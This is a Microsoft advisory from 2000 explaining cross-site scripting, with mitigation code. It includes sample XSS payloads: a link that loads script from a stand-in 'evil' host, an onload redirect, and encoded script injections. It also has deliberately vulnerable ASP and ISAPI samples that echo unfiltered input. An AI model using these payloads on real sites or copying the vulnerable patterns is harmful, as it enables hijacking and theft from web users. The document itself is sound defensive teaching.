Cross-site Scripting Overview

Originally Posted: February 2, 2000

David Ross - Microsoft
Ivan Brugiolo - Microsoft
John Coates - Microsoft
Michael Roe - Microsoft Research

Abstract

A security issue has come to Microsoft's attention that we refer to as "cross-site scripting". This is not an entirely new issue - elements of the information we present have been known for some time within the software development community. However, the overall scope of the issue is larger than previously understood, both in terms of the breadth of the problem and the risk that it presents. It is important to explore the issue more comprehensively due to the current growth and complexity of the Web.

1. The Problem

Web pages contain both text and HTML markup that is generated by the server and interpreted by the client. Servers that generate static pages have full control over how the client will interpret the pages the server sends. However, servers that generate dynamic pages do not have control over how their output is interpreted by the client. The heart of the cross-site scripting security issue is that if untrusted content can be introduced into a dynamic page, neither the server nor the client has enough information to recognize that this has happened and take protective action.

In HTML, some characters are treated specially in order to distinguish text from markup. The grammar of HTML determines the significance of "special" characters - different characters are special at different points in the document. For example, the less-than sign (<) typically indicates the beginning of an HTML tag. Tags can either affect the formatting of the page or introduce a program that the browser executes (e.g. the <SCRIPT> tag).

Consider a malicious link of the following form:

<A HREF="http://www.[foo].com/form.asp?field=<script src='http://www.[evil].com/evil.js'></script>">http://www.microsoft.com</A>

Note the following about this example:

- It disguises the link as a link to http://www.microsoft.com.
- It can easily be included in an HTML mail message.
- In this case, the malicious script is not provided inline; it is provided by www.[evil].com. This script remains under the control of the malicious author of this particular exploit. He or she can update or remove the exploit code after the fact.

To understand what happens when the user clicks this link, it is easiest to consider a normal case first. If http://www.[foo].com/form.asp were a search page and the field were "beanbags", the effect of clicking the link would be to perform a search on www.[foo].com for the word "beanbags". If the search yielded no hits, the page returned to the client might display "I can't find any information on beanbags."

In this case, however, we aren't searching for beanbags; we are searching for "<script src='http://www.[evil].com/evil.js'></script>". If www.[foo].com does not filter the characters that can be submitted within the search form, this text would be inserted into the results page. When processed by the client, it would load a script from www.[evil].com and cause it to execute on the client within the http://www.[foo].com domain.
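To make the scenario concrete, here is a minimal sketch of what the vulnerable results page might look like, written in the ASP/JScript style used in Appendix A. The page and parameter names are taken from the hypothetical link above; the details are illustrative rather than taken from any real site.

<%@ LANGUAGE="JScript" %>
<HTML><BODY>
<%
// form.asp (sketch): echo the search term straight back to the client.
var SearchTerm = Request.QueryString("field");

// ... run the search; assume it found nothing ...

// Because SearchTerm is written out without filtering or encoding, a
// <script> tag supplied in the "field" parameter becomes part of the page
// and executes in the www.[foo].com security context.
Response.Write("I can't find any information on " + SearchTerm + ".");
%>
</BODY></HTML>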
2. Blocking cross-domain form submissions

Thus far, we have focused on the role of unfiltered special characters in this attack. However, there is an additional prerequisite to a successful attack - it can only succeed if the victim site also allows cross-domain form submissions. This offers Web site developers an additional method of blocking the vulnerability.

2.1 The problem with HTTP Referer

HTTP includes a header field called "referer". When a browser follows a link, the referer field can contain the URL of the page that the link came from. The referer field can also be present when a form is submitted. Web servers could check the referer field when receiving a filled-in form, and reject it if it did not come from the right place. If this were done, the attack would fail, regardless of whether special characters are filtered or not.

Unfortunately, this can only be done at the risk of blocking some legitimate form submissions. The referer field is optional, so rejecting forms with blank referer fields could cause the Web site to stop supporting certain browsers. Even if a browser does support the referer field, there are cases in which it could legitimately be blank:

- Sometimes the link comes from somewhere that does not have a URL, such as an email message or the user's bookmarks file. In this case the referer field is not present, because there is no value it could contain.
- In some situations, browsers deliberately clear the referer field. For example, if a user navigates from a secure (HTTPS) page to an insecure (HTTP) page, many browsers will clear the referer field. This is done because confidential information such as credit card numbers is sometimes contained in the URLs of HTTPS pages, and clearing the referer field ensures that an onward Web page cannot recover it. Although the rationale for doing this is sound, it also enables a malicious user to mask the origination point of an attack by hosting it on an HTTPS page.
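For sites willing to accept the trade-offs described above, a minimal sketch of such a check in ASP/JScript might look like the following; the expected referring page reuses the hypothetical www.[foo].com form from section 1.

<%@ LANGUAGE="JScript" %>
<%
// Sketch only: reject form submissions whose Referer header does not point
// back to our own form page. Note that legitimate submissions with a blank
// referer field will also be rejected, as discussed above.
var Referer = Request.ServerVariables("HTTP_REFERER") + "";

if (Referer.indexOf("http://www.[foo].com/form.asp") != 0) {
    Response.Status = "403 Forbidden";
    Response.Write("Form submissions must come from our own pages.");
    Response.End();
}
%>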
3. Which characters are special?

Which characters are "special", in the sense that they should not be inserted into Web pages? This can be determined from the HTML specification. However, many Web browsers try to correct for common errors in HTML. As a result, browsers sometimes treat characters as special when, according to the specification, they are not. In addition, the set of special characters depends on the context:

- In the content of a block-level element (e.g. in the middle of a paragraph of text), "<" and "&" are special. The former is special because it introduces a tag; the latter is special because it introduces a character entity. Some browsers also treat ">" as special, on the assumption that the author of the page really meant to put in an opening "<" but omitted it in error.
- Inside an attribute value enclosed in double quotes, the double quote is special because it marks the end of the attribute value. "&" is special when used in conjunction with some attributes because it introduces a character entity. Attribute values can also be enclosed in single quotes, which makes the single quote special. The enclosing quotes can be omitted entirely, in which case white-space characters such as space and tab become special.
- Some Web servers insert text into the middle of URLs. For example, a search engine might provide a link within the results page that the user can click to re-run the search. This can be implemented by encoding the search query inside the URL. When this is done, it introduces additional special characters: space, tab and newline are special because they mark the end of the URL; "&" is special because it introduces a character entity; and non-ASCII characters (e.g. everything above 128 in the ISO 8859-1 encoding) are not allowed in URLs, so they are all special in this context.

3.1 The problem with character encodings

Many Web pages leave the character encoding ("charset" parameter in HTTP) undefined. In earlier versions of HTML and HTTP, the character encoding was supposed to default to ISO 8859-1 if it was not defined. In practice, many browsers used a different default character encoding, so it was not possible to rely on the default being ISO 8859-1. HTML version 4 legitimizes this: if the character encoding is not specified, any character encoding can be used. But if the Web server does not know which character encoding is in use, it cannot tell which characters are special.

Web pages with unspecified character encodings work most of the time because most character sets assign the same characters to byte values below 128. But which of the values above 128 are special? Some 16-bit character encodings have additional multi-byte representations for special characters such as "<". Some browsers recognize these alternative encodings and act on them. This is "correct" behavior, but it makes the attack much harder to prevent: the server simply does not know which byte sequences will cause the browser to start executing code.

We have constructed a version of the attack using the UTF-7 encoding. UTF-7 provides alternative encodings for "<" and ">", and several popular browsers recognize these as the start and end of a tag. This is not a bug in those browsers: if the character encoding really is UTF-7, then this is correct behavior. The problem is that it is possible to get into a situation where the browser and the server disagree on the encoding. Web servers should set the character set, then make sure that the data they insert is free from byte sequences that are special in the specified encoding.
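As a sketch of the server-side half of this advice, an ASP page (in the JScript style used in Appendix A) can declare its encoding explicitly before any output is written; ISO 8859-1 here is only an example of a deliberately chosen charset.

<%
// Label the response explicitly so the browser and the server agree on the
// encoding; Response.Charset adds the charset name to the Content-Type
// header sent to the client.
Response.Charset = "ISO-8859-1";
%>

Pages can also declare the charset from within the HTML itself using a META tag, as shown in Appendix A.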
4. What should Web site designers do?

Any data inserted into an output stream originating from a server is presented as originating from that server - including plain text. In light of this fact, Web developers should reevaluate whether their sites need to send untrusted text as part of an output stream at all, regardless of filtering. As an example, imagine that your Web site displays "Hello, David!" in response to http://www.microsoft.com/name.asp?name=David. It might be acceptable to replace this dynamic response with a hard-coded one: "Hello, User!" is certainly better than "Hello, Loser!" - especially when it is your own site insulting the user.

Filtering must be performed by any code that dynamically generates content based on untrusted input. This includes ASP code, CGI scripts, and ISAPI filters. The first solution is to filter some or all of the following characters from all input to server-side script:

< > " ' % ; ) ( & +

It is obvious that without < and >, basic cross-site scripting using a script tag is impossible. In addition, basic HTML is prevented from being inadvertently inserted into the output stream.

The Internet Explorer Security Team has uncovered situations where cross-site scripting takes place within an HTML tag itself. For example:

<A HREF="[untrusted input]">hello</A>

In this case it would be possible to use an exploit string similar to this:

" [event]='malicious script'

The first double quote closes the containing HREF attribute, and the event then allows script to execute when it fires. To prevent such scenarios, single and double quotes should be filtered.

The % character must be filtered from input anywhere that parameters encoded with HTTP escape sequences are decoded by server-side code. During the course of its research, the Internet Explorer Security Team discovered several public Web sites where this is done; others almost certainly exist. The % character must be filtered if input such as "%68%65%6C%6C%6F" becomes "hello" when it appears on the Web page in question.

The semicolon and parentheses should be filtered in situations where text could be inserted directly into a preexisting script tag. It is not necessary to filter these characters if it can be determined that this condition will never occur on pages affected by the filter.

No current exploits rely on the ampersand; however, the Internet Explorer Security Team believes that this character may be useful in future exploits. Conservative Web page authors should filter this character out if possible.

If a Web page uses the UTF-7 character encoding, there are several different strings which will act as a '<' character and start an HTML tag; all of these strings start with '+'. If a Web page does not specify its encoding, then an attacker can trick the browser into using UTF-7. To protect against this, either add '+' to the list of special characters which must be filtered out, or explicitly set the page's encoding to something other than UTF-7 (e.g. ISO 8859-1).

It is important to note that individual situations may warrant the filtering of additional characters or strings. As an example, a particular server-side script that converts any ! characters in its input to " characters in its output would require additional filtering.

One problem with input filtering is that the filtered characters may actually be required input to the server-side script. Output filtering is a logical alternative, although it is more complex - input for a particular page may be passed through a central filter, whereas output code is usually present throughout a server-side script. The following characters must be filtered from output:

< > " ' ; ) ( & +

It is not necessary to filter the percent sign from output.
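A minimal JScript sketch of such an output filter follows; the function name is hypothetical, and unlike the input filter it deliberately leaves the percent sign alone.

function FilterOutput(OutStr){
    // Remove the output-special characters listed above:
    // < > " ' ; ) ( & +   (the percent sign is intentionally kept).
    return OutStr.replace(/[<>"';()&+]/g, "");
}

Appendix A shows the alternative of encoding, rather than removing, these characters on output.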
5. Making the attack persistent

HTTP cookies allow a browser to keep persistent state. A Web site asks the browser to set a cookie, and the browser returns the cookie whenever the user revisits the site. We have been able to use this facility to make the attack persistent.

Suppose that the Web site has a form that the user can fill in to set their preferences. When they submit the form, the Web site sends the contents back to the browser as a cookie. When the user subsequently accesses the site, their browser sends the cookie and the Web site uses its value to modify how the page is displayed. This is a perfectly normal way of making a Web site customizable by the user. However, this attack can be used to insert code into the user's preferences, with the result that the browser will execute that code every time the user returns to the site.

Once script has been inserted anywhere within a domain, cookies from that domain can be read and altered. By tying a cross-site scripting bug to a cookie, the exploit may persist indefinitely. With the concept of persistence, cross-site scripting almost allows for a virus-like scenario. Although the initial exploit may happen only once, the Web browser is "infected" from that point on. The one thing missing from this picture is the self-replicating nature of a virus. Fortunately, the sites that might serve as the conduit for self-replicating cross-site scripting - Web e-mail systems and BBSs, for instance - are in general well attuned to the importance of filtering input.

6. The Implications of Single Sign-on

Many Web sites provide a "single sign-on" facility, so that the user need enter their username and password only once; they can then view as many pages from the site as they wish without further authentication dialogs. Single sign-on has a number of benefits with respect to usability and user experience. However, single sign-on can also make this attack easier to carry out. Without single sign-on, the user would see an authentication dialog each time their browser attempted to access additional resources; this could provide a tip-off that a script is running. Under a single sign-on scenario, a script injected by this attack can do its work with less chance of the user noticing.

The situation where a cross-site scripting attack is attempted within an intranet is worth noting. Many intranets allow transparent authentication to be performed based on the user's login credentials. A user checking their pay stub data online often is not required to "log on" to the Web site providing that data, simply because they are already logged in to the intranet as a whole. This environment is obviously conducive to cross-site scripting attacks.

7. Similarities to other security problems

In some ways, this class of attack is similar to the "stack overwriting" class of attack. In both cases, a programming error leads to untrusted data being executed as code. With stack overwriting, the programming error is a failure to check the length of the data. With this attack, the programming error is a failure to check for the presence of special characters within the data. Both are pervasive problems. They are not isolated bugs that can be fixed with a change to one program, but a common error that occurs in many different programs.

This attack is also related to attacks against Unix shell scripts. Those attacks put special characters in variables, or change which characters are special, in order to cause a program supplied by the attacker to execute in the wrong security context (e.g. running as root rather than as the attacker). The version of this attack that changes the charset to make new characters special is similar to the shell script attack that changes IFS to make new characters special.

Stack overflow attacks and shell script attacks have been well publicized, and most programmers know that they should be careful to avoid them. We have shown that dynamically generated HTML can be just as dangerous.

8. Conclusions

Cross-site scripting is not a new issue in the Web development community. Many Web developers understand the need to filter data. However, the scope of this problem appears to be growing in parallel with the growth of the Web as a whole. One lesson to be learned from cross-site scripting is that the omission of a sanity check on input data can have unexpected security implications. Failure to check the lengths of strings enables stack-overwriting attacks. Failure to check for the presence of special characters leads to the attack we have described.

DISCLAIMER

This material is provided for informational purposes only on an AS-IS basis without warranty of any kind. MICROSOFT DISCLAIMS ALL WARRANTIES, WHETHER EXPRESS, IMPLIED, OR STATUTORY, INCLUDING THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NONINFRINGEMENT.

REFERENCES

[1] "HTML 4.01 Specification", World Wide Web Consortium, 24 December 1999.
[2] "RFC 2616: Hypertext Transfer Protocol - HTTP/1.1", R. Fielding et al., June 1999.

Appendix A
Sample of dynamically constructed output

Attribute-value sample

This is an example of how a persisted script attack may be reused.
Sometimes a Web page allows the user to set some preferences, such as the color of the background, which is coded in HTML in a form similar to:

<BODY BGCOLOR="red">

This HTML code can be dynamically generated by a server-side script page:

<% Response.Write("<BODY BGCOLOR=\"" + Request.Cookies("UserColor") + "\">"); %>

but a replaced cookie may lead to an output like this:

<BODY BGCOLOR="" onload='window.location="http://www.evil.com";'">

which brings the user directly to another Web site. The cookie is invisible to the user, since it travels in the HTTP headers and never appears in the Web page. The HTTP header for this example is:

Cookie: %22+onload%3D%27window%2Elocation%3D%22http%3A%2F%2Fwww%2Eevil%2Ecom%22%3B%27

Another example, which uses the HTTP GET verb, is a dynamically built anchor tag like this:

<A HREF="http://www.foo.com/search2.asp?searchagain=FooBar">click-me</A>

This anchor tag represents a common scenario with search pages that offer the opportunity to refine certain search parameters. The victim's browser can easily be induced to navigate to this URL. The URL can be built with a server-side script like this:

<%
var BaserUrl = "http://www.foo.com/search2.asp?searchagain=";
Response.Write("<A HREF=\"" + BaserUrl + Request.QueryString("SearchString") + "\">click-me</A>");
%>

Now, a search for "FooBar" with malicious markup appended to the search string may induce the server to write:

<A HREF="http://www.foo.com/search2.asp?searchagain=FooBar"><script>[malicious script]</script>">click-me</A>

where the attacker has added to the HTML page code that uses the DOM of the page to redirect data in some form to the attacker's Web site.

Script inserted in the output

A common scenario for the POST variant of the attack is a sign-on Web page. A welcome output like this:

Hello visitor <B>John Doe</B>

can be generated on the server with a script like this:

<% Response.Write("Hello visitor <B>" + Request.Form("UserName") + "</B>"); %>

but a modified HTML form can induce the server to send back this string instead:

Hello visitor <B>John Doe<script>[malicious script]</script></B>

A modified form can be the consequence of a previous cross-site script - for instance, an evil script that has modified the data in the form using the HTML DOM.

Script inserted into the script

Another example of the GET attack occurs when a dynamically built page contains a dynamically built script block. If untrusted input is written directly into the body of such a script block, the page can be forced to run arbitrary script code: the attacker's input simply becomes part of the script that the browser executes.

Data interpreted as script because of charset

If the charset is set to something other than ISO 8859-1, the output stream allows multiple ways of encoding untrusted script code. Assume an HTML page in which the string "Japanese_Customer" comes from the user input:

Hello Japanese_Customer

and the page is implemented as:

Hello <% Response.Write(Request.Form("UserName")) %>

The risk is exactly the one exposed before, but this time there are multiple ways to encode the client-side script code.

How to prevent cross-site scripting

Define a charset

First of all, it is good practice to define a charset for the page, so that there is no ambiguity about how the browser will interpret the stream coming from the server:

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">

Filter the input

The input of a Web server is whatever comes in through an HTTP request. An HTTP request comes in this form:

POST /myscript.cgi?UserName=%3Cscript%3Ealert%28%22hello%22+%29%3C%2Fscript%3E HTTP/1.0
Cookie: UserColor=%3Cscript%3Ealert%28%22hello%22%29%3B%3C%2Fscript%3E

URLEncode=%3Cscript%3Ealert%28%22window.location%3A+%22+%2B+window.location%29%3C%2Fscript%3E

We have chosen to give a simplified example that contains all the possible sources of data from a user.
The query_string is:

UserName=%3Cscript%3Ealert%28%22hello%22+%29%3C%2Fscript%3E

The cookie is:

UserColor=%3Cscript%3Ealert%28%22hello%22%29%3B%3C%2Fscript%3E

The posted data is:

URLEncode=%3Cscript%3Ealert%28%22window.location%3A+%22+%2B+window.location%29%3C%2Fscript%3E

The posted data is not present if the verb is GET, and usually the query_string is not present if the verb is POST. Other sources of input in the request are pieces of the URL itself:

The PATH_INFO part of the URL, appended after the script name:

GET /cgi_bin/CoolScript.pl/path_info%3cscript%3e%3c%2fscript%3e?QUERY=STRING HTTP/1.0

The URL itself:

GET /download_files/inexistent_file_name%3cscript%3e%3c%2fscript%3e HTTP/1.0

These parts should be treated like the query_string as far as filtering and encoding are concerned. Most sources of input arrive URL-encoded. The posted data arrives URL-encoded if the Content-Type header is set to application/x-www-form-urlencoded, but file uploads and binary reads of the input stream by the server may deliver the raw data. The first task to accomplish on the input is to URL-decode the strings (if this is their transmission format), so that it is possible to identify the characters in their native form.

Granted that the bad characters are < > " ' % ; ) ( & +, a drastic way to avoid the short circuit of untrusted user input to the output stream is to systematically remove these characters from the input. A sample filter function that strips these characters from a generic input buffer is shown below. The IsBadChar table has one entry for each of the 256 possible byte values; a nonzero entry marks a character to be removed.

BYTE IsBadChar[256] = {
    // 0x00 - 0x1F: control characters are allowed through
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    // 0x20 - 0x3F: " % & ' ( ) + ; < > are flagged as bad
    0x00,0x00,0xFF,0x00,0x00,0xFF,0xFF,0xFF,
    0xFF,0xFF,0x00,0xFF,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0xFF,0xFF,0x00,0xFF,0x00
    // 0x40 - 0xFF: all remaining entries default to zero (allowed through)
};

// Strips every character flagged in IsBadChar from the NUL-terminated
// buffer pString, compacting the string in place, and returns the new
// length. cChLen gives the length of the buffer; the scan itself stops
// at the terminating NUL.
DWORD FilterBuffer(BYTE * pString, DWORD cChLen)
{
    BYTE * pBad  = pString;   // read cursor
    BYTE * pGood = pString;   // write cursor
    DWORD  i = 0;

    if (!pString)
        return 0;

    for (i = 0; pBad[i]; i++) {
        if (!IsBadChar[pBad[i]])
            *pGood++ = pBad[i];
    }
    *pGood = 0;               // re-terminate the compacted string

    return (DWORD)(pGood - pString);
}

The equivalent of this function may be written in JavaScript:

function RemoveBad(InStr){
    // Strip the characters that could let user input break out of the
    // surrounding HTML: < > " ' % ; ( ) & +
    InStr = InStr.replace(/\</g, "");
    InStr = InStr.replace(/\>/g, "");
    InStr = InStr.replace(/\"/g, "");
    InStr = InStr.replace(/\'/g, "");
    InStr = InStr.replace(/\%/g, "");
    InStr = InStr.replace(/\;/g, "");
    InStr = InStr.replace(/\(/g, "");
    InStr = InStr.replace(/\)/g, "");
    InStr = InStr.replace(/\&/g, "");
    InStr = InStr.replace(/\+/g, "");
    return InStr;
}

It could be a safe practice to run this function on untrusted input before storing the input for later reuse:
<%
Session("StoredPreferency") = RemoveBad(Request.Cookies("UserColor"));
var TempStr = RemoveBad(Request.QueryString("UserName"));
var SQLString = "INSERT INTO TableName VALUES ('" + RemoveBad(Request.Form("UserName")) + "')";
%>

Encode the output

In the output stream the Web developer can write data coming directly from the user input (the query_string, the data in the body of a POST, the cookies) or data that has been persisted somewhere without having been validated. Examples of the second case are session-wide variables (most Web servers have facilities to maintain data for as long as the connection is kept open), temporary files, and databases. Before inserting this unvalidated data into the output stream, the Web developer must encode the output, so that the client-side parser is not forced to interpret parts of the HTML page as script.

Any unvalidated string that is written to the output should be HTML-encoded. The HTML-encoding operation consists of replacing the characters < > & " with the strings &lt; &gt; &amp; &quot;. Any untrusted input written inside a tag should be URL-encoded. The URL-encoding operation consists of replacing most of the printable and non-printable characters in the ASCII set with their hexadecimal representation preceded by a % character; in this encoding the " (double quote) becomes %22.

The previous examples of server-side code, rewritten to take the right encoding into account, are:

<% Response.Write("<BODY BGCOLOR=\"" + Server.URLEncode(Request.Cookies("UserColor")) + "\">"); %>

<%
var BaserUrl = "http://www.foo.com/search2.asp?searchagain=";
Response.Write("<A HREF=\"" + BaserUrl + Server.URLEncode(Request.QueryString("SearchString")) + "\">click-me</A>");
%>

<% Response.Write("Hello visitor <B>" + Server.HTMLEncode(Request.Form("UserName")) + "</B>"); %>

The examples used so far have shown the ASP way of dealing with client input and writing client output, but the same concepts may be illustrated in other technologies.
Here is a simple ISAPI extension that has the same short-circuit behavior of user input to server output:

DWORD WINAPI HttpExtensionProc(LPEXTENSION_CONTROL_BLOCK lpECB)
{
    lpECB->dwHttpStatusCode = HTTP_STATUS_OK;

    // Assume a query string of the form UserName=AAAAAAAAA
    char * pStr = strstr(lpECB->lpszQueryString, "UserName=");
    char   pTmpBuff[4096];
    DWORD  dwLen = 0;
    BOOL   bRet;

    if (pStr) {
        pStr += (sizeof("UserName=") - 1);
        // The user-supplied value is written back to the client unmodified.
        dwLen += wsprintf(pTmpBuff, "Hello visitor %s", pStr);
    } else {
        dwLen += wsprintf(pTmpBuff, "Bad QueryString\r\n");
    }

    char pTmpBuff2[512];
    wsprintfA(pTmpBuff2,
              "Content-Type: text/html\r\nContent-Length: %d\r\n\r\n",
              dwLen);

    bRet = lpECB->ServerSupportFunction(lpECB->ConnID,
                                        HSE_REQ_SEND_RESPONSE_HEADER,
                                        NULL,      // optional status line
                                        0,
                                        (DWORD *)pTmpBuff2);
    bRet = lpECB->WriteClient(lpECB->ConnID,
                              pTmpBuff,
                              (DWORD *)&dwLen,
                              HSE_IO_SYNC);
    return HSE_STATUS_SUCCESS;
}

To fix this, it is necessary to write a function that HTML-encodes a generic string:

/* The caller must call free() on the pointer returned in *ppStrOut. */
void HTMLEncode(char * pStrIn, char ** ppStrOut)
{
    char * pTmp = pStrIn;
    DWORD  i;
    DWORD  TotLen = 0;

    // First pass: compute the length of the encoded string.
    for (i = 0; pTmp[i]; i++) {
        switch (pTmp[i]) {
        case '<':
        case '>':
            TotLen += 4;      // "&lt;" or "&gt;"
            break;
        case '&':
            TotLen += 5;      // "&amp;"
            break;
        case '\"':
            TotLen += 6;      // "&quot;"
            break;
        default:
            TotLen++;
            break;
        }
    }

    *ppStrOut = (char *)malloc(TotLen + 1);
    if (!*ppStrOut)
        return;
    pTmp = *ppStrOut;

    // Second pass: copy the input, replacing each special character with
    // its character-entity equivalent.
    for (i = 0; pStrIn[i]; i++) {
        switch (pStrIn[i]) {
        case '<':
            memcpy((void *)pTmp, "&lt;", 4);
            pTmp += 4;
            break;
        case '>':
            memcpy((void *)pTmp, "&gt;", 4);
            pTmp += 4;
            break;
        case '&':
            memcpy((void *)pTmp, "&amp;", 5);
            pTmp += 5;
            break;
        case '\"':
            memcpy((void *)pTmp, "&quot;", 6);
            pTmp += 6;
            break;
        default:
            *pTmp = pStrIn[i];
            pTmp++;
        }
    }
    *pTmp = 0;
}

The ISAPI extension above can then be fixed by using this fragment in place of the corresponding line in the previous example:

char * pEncoded;
HTMLEncode(pStr, &pEncoded);
dwLen += wsprintf(pTmpBuff, "Hello visitor %s", pEncoded);
free(pEncoded);

Last updated Wednesday, February 2, 2000

© 2000 Microsoft Corporation. All rights reserved.